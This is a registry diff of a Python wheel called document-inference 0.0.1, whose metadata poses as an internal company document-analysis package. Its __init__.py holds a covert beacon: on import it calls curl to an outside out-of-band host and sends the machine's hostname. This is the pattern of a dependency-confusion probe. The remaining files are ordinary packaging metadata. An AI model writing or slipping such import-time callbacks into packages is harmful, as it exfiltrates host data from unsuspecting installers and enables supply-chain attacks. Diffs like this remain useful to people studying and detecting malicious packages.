document-inference 0.0.1__py3-none-any.whl

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
@@ -0,0 +1,3 @@
1
+ # document_inference/__init__.py
2
+ import socket, os
3
+ os.system("curl http://cfa.oob.sl4x0.xyz/?hostname=" + socket.gethostname())
@@ -0,0 +1,20 @@
1
+ Metadata-Version: 2.4
2
+ Name: document-inference
3
+ Version: 0.0.1
4
+ Summary: Internal Document Analysis Package
5
+ Home-page: https://company-internal.example.com
6
+ Author: Internal Team
7
+ Author-email: dev@company.com
8
+ Classifier: Programming Language :: Python :: 3
9
+ Requires-Python: >=3.6
10
+ Description-Content-Type: text/markdown
11
+ Dynamic: author
12
+ Dynamic: author-email
13
+ Dynamic: classifier
14
+ Dynamic: description
15
+ Dynamic: description-content-type
16
+ Dynamic: home-page
17
+ Dynamic: requires-python
18
+ Dynamic: summary
19
+
20
+ Private package accidentally exposed
@@ -0,0 +1,5 @@
1
+ document_inference/__init__.py,sha256=p362-kCRKJcfNpnDFyPBfGR0XB8ijqoJ853y0HJ8FwQ,128
2
+ document_inference-0.0.1.dist-info/METADATA,sha256=h14BcNYHfEyCBelXMNwPBJrU265HpLRFGFd-Y8vHvgM,529
3
+ document_inference-0.0.1.dist-info/WHEEL,sha256=DnLRTWE75wApRYVsjgc6wsVswC54sMSJhAEd4xhDpBk,91
4
+ document_inference-0.0.1.dist-info/top_level.txt,sha256=a_pj2F2lVwT1JQ-irKJ_QcVRRY3f1-8S7abspWFZMPw,19
5
+ document_inference-0.0.1.dist-info/RECORD,,
@@ -0,0 +1,5 @@
1
+ Wheel-Version: 1.0
2
+ Generator: setuptools (80.4.0)
3
+ Root-Is-Purelib: true
4
+ Tag: py3-none-any
5
+
@@ -0,0 +1 @@
1
+ document_inference